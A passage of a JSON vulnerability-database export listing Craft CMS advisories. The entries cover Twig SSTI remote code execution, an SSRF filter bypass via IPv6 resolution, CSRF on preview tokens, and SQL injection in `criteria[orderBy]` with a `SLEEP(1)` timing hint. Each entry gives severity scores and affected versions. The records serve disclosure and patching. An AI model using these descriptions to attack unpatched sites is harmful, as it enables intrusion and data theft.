bilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41130","GHSA-95wr-3f2v-v2wh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gzry-xtu5-ukhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57972?format=json","vulnerability_id":"VCID-h6t5-pdp5-8qhe","summary":"Craft CMS Potential Remote Code Execution via Twig SSTI\nNote that users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to [GHSA-f3cw-hg6r-chfv](https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv)\n\nUsers should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.\n\nResources: https://github.com/craftcms/cms/pull/17612","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811","reference_id":"","reference_type":"","scores":[{"value":"0.00227","scoring_system":"epss","scoring_elements":"0.45595","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc"},{"reference_url":"https://github.com/craftcms/cms/pull/17612","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/pull/17612"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811","reference_id":"CVE-2025-57811","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811"},{"reference_url":"https://github.com/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74412?format=json","purl":"pkg:composer/craftcms/cms@5.8.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.7"}],"aliases":["CVE-2025-57811","GHSA-crcq-738g-pqvc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h6t5-pdp5-8qhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50333?format=json","vulnerability_id":"VCID-hkp9-3hzv-quhk","summary":"Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01541","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129","reference_id":"CVE-2026-27129","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129"},{"reference_url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27129","GHSA-v2gc-rm6g-wrw9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkp9-3hzv-quhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50790?format=json","vulnerability_id":"VCID-hyct-5gap-7kdu","summary":"Craft CMS has a potential information disclosure vulnerability in preview tokens\nCraft CMS has a CSRF issue in the preview token endpoint at `/actions/preview/create-token`.  The endpoint accepts an attacker-supplied `previewToken`.\n\nBecause the action does not require POST and does not enforce a CSRF token, an attacker can force a logged-in victim editor to mint a preview token chosen by the attacker.\n\nThat token can then be used by the attacker (without authentication) to access previewed/unpublished content tied to the victim’s authorized preview scope.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00694","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29113","reference_id":"CVE-2026-29113","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29113"},{"reference_url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74587?format=json","purl":"pkg:composer/craftcms/cms@5.9.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.7"}],"aliases":["CVE-2026-29113","GHSA-vg3j-hpm9-8v5v"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hyct-5gap-7kdu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50071?format=json","vulnerability_id":"VCID-jeyh-3jxd-z3g6","summary":"Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`\nThe `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.\nAn attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).\n\n> [!NOTE]\n> The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03183","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495","reference_id":"CVE-2026-25495","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495"},{"reference_url":"https://github.com/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2453-mppf-46cj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25495","GHSA-2453-mppf-46cj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jeyh-3jxd-z3g6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57249?format=json","vulnerability_id":"VCID-jsfs-azcs-mfcm","summary":"Craft CMS Contains a Potential Remote Code Execution Vulnerability via Twig SSTI\nCraft CMS contains a potential remote code execution vulnerability via Twig SSTI. You must have administrator access and `ALLOW_ADMIN_CHANGES` must be enabled for this to work.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\n\nUsers should update to the patched versions (4.14.13 and 5.6.15) to mitigate the 